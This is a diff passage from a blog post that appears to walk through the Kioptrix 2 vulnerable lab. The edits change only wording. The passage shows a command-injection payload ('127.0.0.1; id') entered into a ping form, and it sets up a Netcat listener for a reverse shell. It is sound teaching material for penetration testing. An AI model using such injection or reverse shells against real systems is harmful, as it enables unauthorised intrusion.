unni-krishnan-95/copy/_posts/2016-12-30-vulnhub-kioptrix2.md

 127.0.0.1; id
 ```

 What this does, is basically tells the system to run __ping__ against our localhost machine (127.0.0.1), then run the __id__ command.
-Technically the "__;__" is a command separator.
+Technically the "__;__" symbol is a command separator.

 <a href="/images/kiop2-4.png"><img src="/images/kiop2-4.png"></a>

 Nice!
 The script is vulnerable to command injection!
-Thus, we can go ahead and attempt a [Reverse Shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).
+Thus, we can go ahead and attempt to invoke a [Reverse Shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

-Let's start by setting up a Netcat listener on port 443 - since this is already open on the victim’s machine.
+Let's start by setting up a Netcat listener on port 443 - since the port is already open on the victim’s machine.

 ```console
 root@kali:~# nc -nlvp 443